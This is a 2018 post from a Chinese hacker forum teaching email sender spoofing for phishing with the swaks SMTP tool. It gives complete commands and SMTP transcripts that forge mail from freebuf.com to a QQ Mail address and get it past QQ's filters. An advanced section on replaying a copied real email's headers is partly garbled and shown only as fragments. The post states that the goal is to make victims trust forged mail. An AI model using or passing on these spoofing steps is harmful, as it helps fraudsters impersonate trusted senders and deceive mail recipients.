QQ登录

只需一步,快速开始

微信登录

扫一扫,访问微社区

黑客驿站

查看: 125|回复: 0

钓鱼邮件初探:黑客是如何进行邮件伪造的?

[复制链接]

183

主题

183

帖子

555

积分

高级会员

Rank: 4

积分
555
发表于 2018-10-6 11:56:52 | 显示全部楼层 |阅读模式
免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
现如今的钓鱼邮件都是通过注册相似的邮箱,或者设置邮箱的显示名称,盼着被害人有看走眼的那一刻,轻信邮件的内容。这种方法需要一定的社工技巧,以及诱导性的语言来诱使被害人上钩。但是对于有一定的经验以及眼力的人来说,还是可以识破骗子的伎俩。
下面我要介绍的这款工具可以最大程度的欺骗你的邮箱,更不要提你的眼睛。当然,此方法不是适用于任何邮箱,毕竟每种邮箱的过滤机制都不相同。gmail在这方面就做的不错。
Swaks - SMTP界的瑞士军刀
安装:kali中自带基本用法:
swaks –to          用来测试邮箱的连通性
root@kali:~# swaks --to xxxx@qq.com
=== Trying mx3.qq.com:25...
=== Connected to mx3.qq.com.
  220 newmx59.qq.com MX QQ Mail Server
-> EHLO kali
  250-newmx59.qq.com
  250-SIZE 73400320
  250-STARTTLS
  250 OK
-> MAIL FROM:root@kali>
  250 Ok
-> RCPT TO:xxxx@qq.com>
  250 Ok
-> DATA
  354 End data with CR>LF>.CR>LF>
-> Date: Tue, 05 Jan 2016 23:15:11 -0500
-> To: xxxx@qq.com
-> From: root@kali
-> Subject: test Tue, 05 Jan 2016 23:15:11 -0500
-> X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
->
-> This is a test mailing
->
-> .
550 Mail content denied. http://service.mail.qq.com/cgi-bin/help?subtype=1&&id=20022&&no=1000726
-> QUIT
  221 Bye
=== Connection closed with remote host.
前面都返回250ok,说明该邮箱存在,并且可以正常收信。最后可以看到qq邮箱返回550错误,qq官方给出的出错原因:该邮件内容涉嫌大量群发,并且被多数用户投诉为垃圾邮件。
我们可以继续对邮件进行伪造,来绕过qq邮箱的判断
比如:
swaks --to xxxx@qq.com --from info@freebuf.com --ehlo freebuf.com --body hello --header "Subject: hello"
其中:
–from
–ehlo
–body
–header
root@kali:~# swaks --to xxxx@qq.com --from info@freebuf.com --ehlo freebuf.com --body hello --header "Subject: hello"
=== Trying mx3.qq.com:25...
=== Connected to mx3.qq.com.
  220 newmx.qq.com MX QQ Mail Server
-> EHLO freebuf.com
  250-newmx.qq.com
  250-SIZE 73400320
  250-STARTTLS
  250 OK
-> MAIL FROM:info@freebuf.com>
  250 Ok
-> RCPT TO:xxxx@qq.com>
  250 Ok
-> DATA
  354 End data with CR>LF>.CR>LF>
-> Date: Tue, 05 Jan 2016 23:23:09 -0500
-> To: xxxx@qq.com
-> From: info@freebuf.com
-> Subject: hello
-> X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
->
-> hello
->
-> .
  250 Ok: queued as
-> QUIT
  221 Bye
=== Connection closed with remote host.
在你ip没有被qq邮箱band的情况下,邮件可以正常发送,返回250 ok。

101621GQ-0.png

101621GQ-0.png


到这一步基本上可以满足伪造邮件的要求了,但是qq邮箱会有安全提示,不过在不注意的情况下,基本上普通用户会轻信邮件中的内容。
高级用法:
使用swaks其实还可以进行更高级的邮件伪造,几乎可以伪造邮件中的每一个参数。
–data
首先,我们需要一份正常的邮件

1016211939-1.png

1016211939-1.png


->  bbplbVZjkAVzVuoZOc03UetuyeF1A3SpS70fm7O8nzDqx918Tpsf+n3dlMN6UaAEV3SJycL
->  1JuHYi2/yTQ7J6XJ4bMhJRRbRROkDmpNEgqGw1Sfo66A/oJUz0rf4tLEr7HgNuls18LrqZV
->  jYfpcX5wglT4lxLNkHZRNBshk=
-> Date: Wed, 6 Jan 2016 12:11:39 +0800
-> Return-Path: services@tophant.com
-> From: =?utf-8?B?RnJlZUJ1Zi/mvI/mtJ7nm5LlrZDmnI3liqHlm6LpmJ8=?= services@tophant.com>
-> Subject: =?utf-8?B?RnJlZUJ1Zi/mvI/mtJ7nm5LlrZDotKbmiLfmv4DmtLvpgq7ku7Y=?=
-> Message-ID: 34db99d2b030c0f7b34bd2c6beca9666@account.tophant.com>
-> X-Priority: 3
-> X-Mailer: PHPMailer 5.1 (phpmailer.sourceforge.net)
-> MIME-Version: 1.0
-> Content-Type: multipart/alternative;
->  boundary="b1_34db99d2b030c0f7b34bd2c6beca9666"
->
->
-> --b1_34db99d2b030c0f7b34bd2c6beca9666
-> Content-Type: text/plain; charset = "utf-8"
-> Content-Transfer-Encoding: 8bit
->
-> FreeBuf/????′???’?-?è′|??·??

1016214431-3.png

1016214431-3.png

1016211428-2.png

1016211428-2.png
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋| HACK DID

GMT+8, 2019-4-25 12:46 , Processed in 0.065418 second(s), 25 queries .

Powered by 柳月论坛

© 2010-2018

快速回复 返回顶部 返回列表